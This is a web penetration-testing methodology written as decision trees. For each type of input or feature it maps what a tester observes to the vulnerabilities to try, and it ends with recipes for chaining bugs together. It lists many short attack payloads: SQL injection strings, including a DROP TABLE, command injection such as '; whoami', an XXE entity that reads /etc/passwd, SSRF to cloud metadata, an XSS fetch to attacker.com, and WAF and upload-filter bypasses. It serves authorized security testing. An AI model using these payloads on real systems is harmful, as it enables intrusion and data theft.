The Master Attack Flow
A "choose your own adventure" methodology for web application penetration testing. Follow the decision trees to identify which vulnerabilities to test based on what you observe. Every path leads to specific methodologies and cheatsheets in this repository.
- How to Use This Flow
- Phase 1: Initial Reconnaissance
- Phase 2: Authentication & Session Attacks
- Phase 3: Input-Based Attacks
- Phase 4: Functionality-Based Attacks
- Phase 5: Infrastructure & Protocol Attacks
- Phase 6: Client-Side Attacks
- Phase 7: Chaining Vulnerabilities
- Quick Reference Matrix
Each section presents a scenario you might encounter during testing. Follow the branches:
βββββββββββββββββββββββββββ
β WHAT DO YOU SEE? β
β β
β [Observation] β
ββββββββββββββ¬βββββββββββββ
β
ββββββββββ΄βββββββββ
βΌ βΌ
ββββββββββ ββββββββββββββ
β YES β β β NO β Move β
β Test: β β to next β
β [Vuln] β β section β
ββββββββββ ββββββββββββββ
| Icon | Meaning |
|---|---|
| π΄ | Critical β test immediately |
| π | High priority |
| π‘ | Medium priority |
| π’ | Low priority / situational |
| π | Checklist item |
| π | Links to methodology |
| β‘ | Quick win potential |
Prerequisites:
- Target is in scope for your bug bounty program
- You have explicit written authorization to test
- Reconnaissance is complete (subdomains mapped, live hosts identified)
- Technology stack is identified (use
resources/cheatsheets/web-penetration.md)
Reference: Use Getting Started Guide for Bug Hunters to set up your environment before following this flow.
Before diving into specific attacks, map the application's surface area.
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β INITIAL APPLICATION ASSESSMENT β
β "What am I looking at?" β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β
βββββββββββββββββββββΌββββββββββββββββββββ
βΌ βΌ βΌ
βββββββββββββββββ βββββββββββββββββ βββββββββββββββββ
β Modern SPA? β β Traditional β β API-Only β
β (React, Vue, β β Server-Render β β Backend? β
β Angular) β β (PHP, .NET, β β (REST, β
β β β Rails) β β GraphQL) β
βββββββββ¬ββββββββ βββββββββ¬ββββββββ βββββββββ¬ββββββββ
β β β
βΌ βΌ βΌ
βββββββββββββββββ βββββββββββββββββ βββββββββββββββββ
β Focus on: β β Focus on: β β Focus on: β
β β’ API calls β β β’ Forms β β β’ Endpoints β
β β’ JWT tokens β β β’ Cookies β β β’ Auth tokens β
β β’ CORS β β β’ Sessions β β β’ Rate limits β
β β’ CSP β β β’ CSRF β β β’ IDOR β
βββββββββββββββββ βββββββββββββββββ βββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β RECON CHECKLIST β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β π Crawl the application (use: Crawling and Fuzzing.md) β
β π Identify all endpoints and parameters β
β π Map API routes (use: API Penetration.md) β
β π Check for GraphQL endpoint (use: GraphQL.md) β
β π Identify tech stack (server, framework, CDN) β
β π Check for hidden vhosts (use: VHost.md) β
β π Look for exposed .git, .env, config files β
β π Check robots.txt, sitemap.xml for hidden paths β
β π Review JavaScript files for endpoints and secrets β
β π Test for broken links (use: Exploit Broken Links.md) β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
π Start Here: methodologies/web penetration/Crawling and Fuzzing β before attacking, know your target.
Every application has authentication. These attacks exploit how users log in and stay logged in.
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β AUTHENTICATION OBSERVED β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β
βββββββββββββββββββββΌββββββββββββββββββββ¬ββββββββββββββββββββ
βΌ βΌ βΌ βΌ
βββββββββββββββββ βββββββββββββββββ βββββββββββββββββ βββββββββββββββββ
β Login Form β β OAuth / SSO β β JWT Tokens β β MFA / 2FA β
β (Email/ β β (Google, β β (Bearer β β (TOTP, SMS, β
β Password) β β GitHub, β β tokens) β β Push) β
β β β SAML) β β β β β
βββββββββ¬ββββββββ βββββββββ¬ββββββββ βββββββββ¬ββββββββ βββββββββ¬ββββββββ
β β β β
βΌ βΌ βΌ βΌ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β LOGIN FORM β TEST FOR... β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β π΄ SQL INJECTION β
β ββ Test: ' OR 1=1-- -, '; DROP TABLE users;-- β
β ββ π SQL Injection.md β
β ββ β‘ Quick Win: Admin bypass with ' OR '1'='1 β
β β
β π΄ BRUTE FORCE β
β ββ Test: Common passwords, username as password β
β ββ π Bruteforcing.md β
β ββ β‘ Quick Win: admin:admin, test:test, guest:guest β
β β
β π USERNAME ENUMERATION β
β ββ Test: Different error messages for user vs password β
β ββ Check: Response timing differences β
β ββ Check: Password reset form reveals valid users β
β β
β π NO SQL INJECTION β
β ββ Test: {"$gt":""}, {"$ne":null} β
β ββ π NoSQL Injection Vulnerabilities.md (web technologies) β
β β
β π‘ SESSION FIXATION β
β ββ Test: Does session token change after login? β
β ββ π Session Fixation.md β
β β
β π‘ HTTP PARAMETER POLLUTION β
β ββ Test: Duplicate parameters in login request β
β ββ π HTTP Parameter Pollution.md β
β β
β π’ RACE CONDITION ON LOGIN β
β ββ Test: Concurrent login requests β
β ββ π Exploiting Race Conditions.md β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Attack Sequence for Login Forms:
- First: Test for SQL Injection (highest impact)
- Then: Attempt brute force with common credentials
- Next: Check for username enumeration
- Finally: Test session handling after login
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β OAUTH / SSO β TEST FOR... β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β π REDIRECT URI MANIPULATION β
β ββ Test: redirect_uri=https://attacker.com β
β ββ Test: redirect_uri=https://target.com.attacker.com β
β ββ π OAuth.md (web penetration) β
β ββ π OAuth Exploitation.md (web technologies) β
β β
β π AUTHORIZATION CODE INJECTION β
β ββ Test: Inject attacker's code into victim's flow β
β ββ π OAuth.md β
β β
β π STATE PARAMETER MISSING β
β ββ Test: CSRF on OAuth authorization request β
β ββ π CSRF.md β
β β
β π‘ OPENID CONNECT MISCONFIGURATION β
β ββ Test: ID token manipulation, alg:none β
β ββ π Open ID Connect.md β
β β
β π‘ IMPLICIT GRANT EXPLOITATION β
β ββ Test: Token leakage in URL fragments β
β ββ π OAuth Exploitation.md β
β β
β π’ SCOPE ESCALATION β
β ββ Test: Add additional scopes to authorization request β
β ββ π OAuth.md β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β JWT TOKENS β TEST FOR... β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β π ALGORITHM CONFUSION β
β ββ Test: Change alg to "none", remove signature β
β ββ Test: Change RS256 to HS256, sign with public key β
β ββ π JWT.md β
β β
β π SIGNATURE BYPASS β
β ββ Test: Empty signature, invalid signature β
β ββ π JWT.md β
β β
β π KEY INJECTION β
β ββ Test: jwk header, jku header, kid injection β
β ββ π JWT.md β
β β
β π‘ TOKEN EXPIRY BYPASS β
β ββ Test: Modify exp claim, use expired tokens β
β ββ π JWT.md β
β β
β π‘ PRIVILEGE ESCALATION VIA CLAIMS β
β ββ Test: Modify role, admin, scope claims β
β ββ π JWT.md + IDOR.md β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β MFA / 2FA β TEST FOR... β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β π MFA BYPASS VIA DIRECT ENDPOINT ACCESS β
β ββ Test: Access /dashboard directly without MFA β
β ββ π MFA-2FA Exploitation.md β
β β
β π MFA BYPASS VIA RESPONSE MANIPULATION β
β ββ Test: Change 2fa_required:true to false β
β ββ π MFA-2FA Exploitation.md β
β β
β π‘ MFA CODE BRUTE FORCE β
β ββ Test: 000000-999999 (if no rate limiting) β
β ββ π Bruteforcing.md + MFA-2FA Exploitation.md β
β β
β π‘ MFA FATIGUE / PUSH BOMBING β
β ββ Test: Repeated push notifications β
β ββ π MFA-2FA Exploitation.md β
β β
β π’ BACKUP CODE ENUMERATION β
β ββ Test: Predictable backup code format β
β ββ π MFA-2FA Exploitation.md β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Every input field is an opportunity. This is the largest attack surface in any application.
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β INPUT TYPE OBSERVED β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β
βββββββββββββββββββββΌββββββββββββββββββββ¬ββββββββββββββββββββ
βΌ βΌ βΌ βΌ
βββββββββββββββββ βββββββββββββββββ βββββββββββββββββ βββββββββββββββββ
β Search β β User- β β API Request β β File Upload β
β Bar / Filter β β Supplied Data β β Parameters β β Function β
β β β (Profile, β β (REST, β β β
β β β Comments, β β GraphQL) β β β
β β β Posts) β β β β β
βββββββββ¬ββββββββ βββββββββ¬ββββββββ βββββββββ¬ββββββββ βββββββββ¬ββββββββ
β β β β
βΌ βΌ βΌ βΌ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β SEARCH / FILTER INPUT β TEST FOR... β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β π΄ SQL INJECTION β
β ββ Test: ' OR 1=1-- -, ' UNION SELECT 1,2,3-- β
β ββ π SQL Injection.md β
β ββ β‘ Quick Win: Look for database errors β
β β
β π΄ XSS (REFLECTED) β
β ββ Test: <script>alert(1)</script> β
β ββ Test: "><img src=x onerror=alert(1)> β
β ββ π xss.md β
β ββ β‘ Quick Win: Search term reflected in page? β
β β
β π COMMAND INJECTION β
β ββ Test: ; id, | whoami, $(whoami) β
β ββ π Injection Exploitation.md β
β β
β π SSTI (TEMPLATE INJECTION) β
β ββ Test: {{7*7}}, ${7*7}, <%= 7*7 %> β
β ββ π SSTI.md β
β ββ β‘ Quick Win: Math expressions evaluate? β
β β
β π‘ LDAP INJECTION β
β ββ Test: *)(uid=*))(|(uid=* β
β ββ π Injection Exploitation.md β
β β
β π‘ XPATH INJECTION β
β ββ Test: ' or '1'='1, '] | //user[name/text()=' β
β ββ π Injection Exploitation.md β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Differential Diagnosis for Search Bars:
| If You See... | It Might Be... | Test This |
|---|---|---|
| Database errors | SQL Injection | ' OR 1=1-- |
| Your input reflected in HTML | Reflected XSS | <script>alert(1)</script> |
| Math calculations executed | SSTI | {{7*7}} |
| System command output | Command Injection | ; whoami |
| LDAP error messages | LDAP Injection | *)(uid=* |
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β USER CONTENT (PROFILE, COMMENTS, POSTS) β TEST FOR... β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β π΄ STORED XSS β
β ββ Test: <script>alert(document.cookie)</script> β
β ββ Test: <img src=x onerror=fetch('https://attacker.com')> β
β ββ π xss.md β
β ββ β‘ Quick Win: Profile fields, comment sections β
β β
β π΄ SQL INJECTION (SECOND-ORDER) β
β ββ Test: Inject in profile, triggers on admin panel β
β ββ π SQL Injection.md β
β β
β π HTML INJECTION β
β ββ Test: <h1>Test</h1>, <a href="https://evil.com">Click β
β ββ π xss.md (if script tags blocked) β
β β
β π FILE UPLOAD IN COMMENTS (if attachments allowed) β
β ββ Test: Upload .php, .jsp, .asp as "image" β
β ββ π File Upload Vulnerabilities.md β
β β
β π‘ CRLF INJECTION IN HEADERS (via user input) β
β ββ Test: %0d%0aSet-Cookie: session=attacker β
β ββ π CRLF Injection.md β
β β
β π‘ PROTOTYPE POLLUTION (if JavaScript-heavy app) β
β ββ Test: __proto__[isAdmin]=true β
β ββ π Prototype Pollution.md β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β API PARAMETERS β TEST FOR... β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β π΄ IDOR (INSECURE DIRECT OBJECT REFERENCE) β
β ββ Test: Change /user/123 β /user/124 β
β ββ Test: Change ?id=123 β ?id=124 β
β ββ π IDOR.md β
β ββ β‘ Quick Win: Sequential IDs, UUIDs in URLs β
β β
β π MASS ASSIGNMENT β
β ββ Test: Add "role":"admin" to user update request β
β ββ π API Penetration.md β
β β
β π SSRF (if parameter contains URL) β
β ββ Test: ?url=http://169.254.169.254/latest/meta-data β
β ββ Test: ?redirect=http://attacker.com β
β ββ π SSRF.md β
β β
β π‘ XXE (if XML input accepted) β
β ββ Test: <!ENTITY xxe SYSTEM "file:///etc/passwd"> β
β ββ π XXE Vulnerabilities.md β
β β
β π‘ GRAPHQL-SPECIFIC ATTACKS β
β ββ Test: Introspection query, batching, depth attacks β
β ββ π GraphQL.md β
β β
β π‘ RACE CONDITION (if state-changing endpoint) β
β ββ Test: Concurrent requests with same coupon code β
β ββ π Exploiting Race Conditions.md β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β FILE UPLOAD FUNCTION β TEST FOR... β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β π΄ UNRESTRICTED FILE UPLOAD (RCE) β
β ββ Test: Upload .php, .jsp, .aspx, .phtml, .php5 β
β ββ Test: Double extension: file.php.jpg β
β ββ Test: Null byte: file.php%00.jpg β
β ββ π File Upload Vulnerabilities.md β
β ββ β‘ Quick Win: Web shell upload = immediate RCE β
β β
β π΄ XXE VIA FILE UPLOAD (if XML/SVG/DOCX accepted) β
β ββ Test: SVG with embedded XXE payload β
β ββ Test: DOCX/XLSX XXE (Office Open XML) β
β ββ π XXE Vulnerabilities.md β
β β
β π XSS VIA FILE UPLOAD β
β ββ Test: SVG with <script> tag, HTML file upload β
β ββ π xss.md β
β β
β π SSRF VIA FILE UPLOAD (if URL upload supported) β
β ββ Test: Upload from URL pointing to internal services β
β ββ π SSRF.md β
β β
β π‘ IMAGETRAGICK / GHOSTSCRIPT RCE β
β ββ Test: Malicious image with ImageMagick payloads β
β ββ π File Upload Vulnerabilities.md β
β β
β π‘ ZIP SLIP / PATH TRAVERSAL IN ARCHIVE β
β ββ Test: Zip file with ../../../etc/passwd entry β
β ββ π LFI and RFI.md β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
File Upload Bypass Cheatsheet:
| Restriction | Bypass Technique |
|---|---|
| Extension blacklist | Try: .php5, .phtml, .pht, .php., .PhP, .pHp |
| MIME type check | Change Content-Type: image/jpeg β text/php |
| Content validation | Add GIF89a; header before PHP code |
| Image-only check | Create polyglot image/webshell with exiftool |
| Server renames file | Check for LFI to include uploaded file |
Beyond inputs, application functions themselves can be vulnerable.
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β FUNCTIONALITY OBSERVED β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β
βββββββββββββββββββββΌββββββββββββββββββββ¬ββββββββββββββββββββ
βΌ βΌ βΌ βΌ
βββββββββββββββββ βββββββββββββββββ βββββββββββββββββ βββββββββββββββββ
β URL/Redirect β β Email β β Import/Export β β WebSocket β
β Parameters β β Functionality β β Functionality β β Connections β
β β β β β β β β
βββββββββ¬ββββββββ βββββββββ¬ββββββββ βββββββββ¬ββββββββ βββββββββ¬ββββββββ
β β β β
βΌ βΌ βΌ βΌ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β URL / REDIRECT PARAMETERS β TEST FOR... β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β π΄ SSRF (if parameter fetches URLs) β
β ββ Test: Internal IPs, cloud metadata, localhost β
β ββ π SSRF.md β
β β
β π΄ OPEN REDIRECT β
β ββ Test: ?redirect=https://evil.com β
β ββ Test: ?next=//evil.com, ?url=https:evil.com β
β ββ π Open Redirect.md β
β β
β π LFI/RFI (if parameter includes files) β
β ββ Test: ?page=../../../../etc/passwd β
β ββ Test: ?page=https://evil.com/shell.php β
β ββ π LFI and RFI.md β
β β
β π‘ DNS REBINDING (if URL is validated then used) β
β ββ Test: Domain that resolves to different IPs β
β ββ π DNS Rebinding.md β
β β
β π‘ HTTP PARAMETER POLLUTION β
β ββ Test: ?url=good.com&url=evil.com β
β ββ π HTTP Parameter Pollution.md β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β EMAIL FUNCTIONALITY β TEST FOR... β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β π EMAIL HEADER INJECTION β
β ββ Test: Bcc: victim@company.com in email field β
β ββ π Email Attacks.md β
β β
β π EMAIL SPOOFING (if app sends emails on user's behalf) β
β ββ Test: From: CEO <ceo@company.com> β
β ββ π Email Attacks.md β
β β
β π‘ SSRF IN EMAIL TEMPLATES (if external images fetched) β
β ββ Test: <img src="http://169.254.169.254/"> β
β ββ π SSRF.md β
β β
β π‘ SSTI IN EMAIL TEMPLATES β
β ββ Test: {{7*7}} in email body or subject β
β ββ π SSTI.md β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β IMPORT / EXPORT β TEST FOR... β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β π XXE IN IMPORT (XML, DOCX, XLSX) β
β ββ Test: Upload XML with external entity β
β ββ π XXE Vulnerabilities.md β
β β
β π CSV/EXCEL FORMULA INJECTION β
β ββ Test: =cmd|'/C calc'!A0 in exported CSV β
β ββ π Injection Exploitation.md β
β β
β π‘ DESERIALIZATION IN IMPORT (if serialized objects) β
β ββ Test: Malicious serialized Java/PHP/Python object β
β ββ π Deserialization.md β
β β
β π‘ IDOR IN EXPORT (export other users' data) β
β ββ Test: Change export ID parameter β
β ββ π IDOR.md β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β WEBSOCKET CONNECTIONS β TEST FOR... β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β π CROSS-SITE WEBSOCKET HIJACKING β
β ββ Test: No Origin validation, missing CSRF token β
β ββ π WebSocket Exploitation.md β
β β
β π UNAUTHORIZED MESSAGE MANIPULATION β
β ββ Test: Modify message content to impersonate users β
β ββ π WebSocket Exploitation.md β
β β
β π‘ IDOR IN WEBSOCKET MESSAGES β
β ββ Test: Change user_id in WebSocket message β
β ββ π IDOR.md + WebSocket Exploitation.md β
β β
β π‘ RACE CONDITION IN REAL-TIME APPS β
β ββ Test: Rapid message sending for duplicate actions β
β ββ π Exploiting Race Conditions.md β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Attacks that target the underlying infrastructure rather than application logic.
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β INFRASTRUCTURE CLUES β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β
βββββββββββββββββββββΌββββββββββββββββββββ¬ββββββββββββββββββββ
βΌ βΌ βΌ βΌ
βββββββββββββββββ βββββββββββββββββ βββββββββββββββββ βββββββββββββββββ
β CDN / WAF β β Load Balancer β β Cache Headers β β Supply Chain β
β Detected β β / Proxy β β (Varnish, β β (npm, pip, β
β β β Detected β β CloudFront) β β composer) β
βββββββββ¬ββββββββ βββββββββ¬ββββββββ βββββββββ¬ββββββββ βββββββββ¬ββββββββ
β β β β
βΌ βΌ βΌ βΌ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β WAF/CDN PRESENT β TEST FOR... β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β π΄ WAF BYPASS TECHNIQUES β
β ββ Test: Encoding, obfuscation, fragmentation β
β ββ π WAF.md (web technologies) β
β β
β π ORIGIN IP DISCLOSURE β
β ββ Test: DNS history, certificate transparency, censys β
β ββ π WAF.md β
β β
β π HTTP REQUEST SMUGGLING β
β ββ Test: CL.TE, TE.CL, TE.TE desync β
β ββ π HTTP Request Smuggling.md β
β ββ β‘ Quick Win: If front-end/back-end mismatch β
β β
β π‘ WEB CACHE DECEPTION β
β ββ Test: /account.css β cached with sensitive content β
β ββ π Web Cache Deception.md β
β β
β π‘ WEB CACHE POISONING β
β ββ Test: Unkeyed headers (X-Forwarded-Host) β
β ββ π Web Cache Deception.md β
β β
β π’ CSP BYPASS (if CSP header present) β
β ββ Test: Script gadgets, JSONP endpoints, CDN whitelist β
β ββ π csp.md β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
WAF Bypass Quick Reference:
| Technique | Example |
|---|---|
| Case variation | <ScRiPt>alert(1)</sCrIpT> |
| Encoding | %3Cscript%3Ealert(1)%3C/script%3E |
| Double URL encoding | %253Cscript%253E |
| Null bytes | <scri%00pt>alert(1)</script> |
| Fragmentation | Send headers in separate packets |
| HTTP Parameter Pollution |
?id=1&id=2 (bypasses WAF regex) |
| Alternative syntax |
`id` instead of ;id
|
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β LOAD BALANCER β TEST FOR... β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β π΄ HTTP REQUEST SMUGGLING β
β ββ Test: CL.TE, TE.CL desync between LB and backend β
β ββ π HTTP Request Smuggling.md β
β β
β π HOST HEADER INJECTION β
β ββ Test: X-Forwarded-Host: evil.com β
β ββ π header-injection.md β
β β
β π‘ PATH CONFUSION / ROUTING BYPASS β
β ββ Test: /admin β //admin β /ADMIN β /;/admin β
β ββ π HTTP Request Smuggling.md β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β CACHE HEADERS β TEST FOR... β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β π WEB CACHE DECEPTION β
β ββ Test: /profile.css, /settings.json caching sensitive β
β ββ π Web Cache Deception.md β
β β
β π WEB CACHE POISONING β
β ββ Test: Unkeyed headers, fat GET requests β
β ββ π Web Cache Deception.md β
β β
β π‘ CLICKJACKING (if cache serves attacker's page) β
β ββ Test: Cache attacker content at victim URL β
β ββ π Clickjacking.md β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β SUPPLY CHAIN INDICATORS β TEST FOR... β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β π DEPENDENCY CONFUSION β
β ββ Test: Internal package names β publish to public repo β
β ββ π Supply Chain Attack.md β
β β
β π EXPOSED SECRETS (GitHub, GitLab) β
β ββ Test: Search repo for .env, credentials, API keys β
β ββ π GitHub Security.md + GitLab.md β
β β
β π‘ CI/CD PIPELINE EXPLOITATION β
β ββ Test: Exposed Jenkins, GitHub Actions injection β
β ββ π CI-CD Security.md + Jenkins.md β
β β
β π‘ TYPOSQUATTING (if app uses public packages) β
β ββ Test: Look for packages with similar names β
β ββ π Supply Chain Attack.md β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Attacks that target the user's browser rather than the server.
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β CLIENT-SIDE BEHAVIOR β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β
βββββββββββββββββββββΌββββββββββββββββββββ¬ββββββββββββββββββββ
βΌ βΌ βΌ βΌ
βββββββββββββββββ βββββββββββββββββ βββββββββββββββββ βββββββββββββββββ
β Cross-Origin β β Frames / β β CSP Header β β JavaScript β
β Requests β β Iframes β β Present β β Heavy App β
β (CORS) β β β β β β β
βββββββββ¬ββββββββ βββββββββ¬ββββββββ βββββββββ¬ββββββββ βββββββββ¬ββββββββ
β β β β
βΌ βΌ βΌ βΌ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β CORS β TEST FOR... β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β π ORIGIN REFLECTION β
β ββ Test: Origin: https://evil.com β reflected in ACAO β
β ββ π CORS.md β
β β
β π NULL ORIGIN ALLOWED β
β ββ Test: Origin: null β ACAO: null β
β ββ π CORS.md β
β β
β π SUBDOMAIN ORIGIN BYPASS β
β ββ Test: Origin: https://evil.target.com β
β ββ π CORS.md β
β β
β π‘ PREFLIGHT BYPASS β
β ββ Test: Simple request that doesn't trigger preflight β
β ββ π CORS.md β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β FRAMES / IFRAMES β TEST FOR... β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β π‘ CLICKJACKING β
β ββ Test: Frame sensitive page, overlay transparent button β
β ββ π Clickjacking.md β
β β
β π‘ TABNABBING β
β ββ Test: Open link with target="_blank", change opener URL β
β ββ π Tabnabbing.md β
β β
β π’ POSTMESSAGE MISCONFIGURATION β
β ββ Test: Wildcard targetOrigin, missing origin check β
β ββ π xss.md (DOM-based XSS via postMessage) β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β CSP HEADER β TEST FOR... β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β π‘ CSP BYPASS VIA CDN WHITELIST β
β ββ Test: Whitelisted CDN has JSONP endpoints? β
β ββ π csp.md β
β β
β π‘ CSP BYPASS VIA SCRIPT GADGETS β
β ββ Test: Legitimate scripts that can execute arbitrary JS β
β ββ π csp.md β
β β
β π‘ UNSAFE-INLINE / UNSAFE-EVAL β
β ββ Test: Inline script execution, eval() abuse β
β ββ π csp.md β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β JAVASCRIPT-HEAVY APP β TEST FOR... β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β π‘ DOM-BASED XSS β
β ββ Test: Sources (location.*, document.URL) β sinks β
β ββ π xss.md β
β β
β π‘ PROTOTYPE POLLUTION β
β ββ Test: __proto__ payloads in object merge operations β
β ββ π Prototype Pollution.md β
β β
β π‘ CLIENT-SIDE DESERIALIZATION β
β ββ Test: Malicious serialized objects in localStorage β
β ββ π Deserialization.md β
β β
β π’ EXPOSED API KEYS IN JS β
β ββ Test: Search .js files for apiKey, token, secret β
β ββ π GitHub Security.md (similar techniques) β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
The highest-impact bugs come from chaining multiple vulnerabilities together.
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β VULNERABILITY CHAINING RECIPES β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
RECIPE 1: XSS β Account Takeover
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Open Redirect + XSS = Full Account Compromise
Step 1: Find open redirect (Open Redirect.md)
Step 2: Use redirect to bypass XSS input filters
Step 3: Steal session cookies, OAuth tokens
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
RECIPE 2: SSRF β Internal Network Access
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
SSRF + Weak Internal Auth = Data Exfiltration
Step 1: Find SSRF endpoint (SSRF.md)
Step 2: Access cloud metadata (169.254.169.254)
Step 3: Use IAM credentials for lateral movement
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
RECIPE 3: File Upload + LFI β RCE
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Unrestricted Upload + Path Traversal = Remote Code Execution
Step 1: Upload web shell as image (File Upload Vulns.md)
Step 2: Find path (check response, predictable locations)
Step 3: Include via LFI vulnerability (LFI and RFI.md)
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
RECIPE 4: CSRF + IDOR β Privilege Escalation
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
CSRF (state change) + IDOR (user's data) = Takeover
Step 1: Find IDOR in profile update (IDOR.md)
Step 2: Create CSRF PoC that targets the IDOR endpoint
Step 3: Victim unknowingly updates their own data
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
RECIPE 5: CRLF + XSS β Cookie Theft
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
CRLF Injection + Reflected XSS = Session Hijacking
Step 1: Inject CRLF to set new cookie (CRLF Injection.md)
Step 2: Chain with XSS to exfiltrate original cookie
Step 3: Use stolen cookie for session hijacking
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
RECIPE 6: Deserialization + SSRF β RCE
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Unsafe Deserialization + Internal Service Access = RCE
Step 1: Find deserialization endpoint (Deserialization.md)
Step 2: Use gadget chain that triggers SSRF
Step 3: Access internal RCE-vulnerable service
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
RECIPE 7: HTTP Smuggling + Cache Poisoning β Persistent XSS
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Request Smuggling + Web Cache = Stored XSS for all users
Step 1: Identify desync (HTTP Request Smuggling.md)
Step 2: Poison cache with XSS payload
Step 3: All visitors get XSS payload from cache
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β YOU FOUND A SINGLE BUG. CAN YOU CHAIN IT? β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β
βΌ
βββββββββββββββββββββββ
β What's the impact? β
ββββββββββββ¬βββββββββββ
β
ββββββββββββββββββββΌβββββββββββββββββββ
βΌ βΌ βΌ
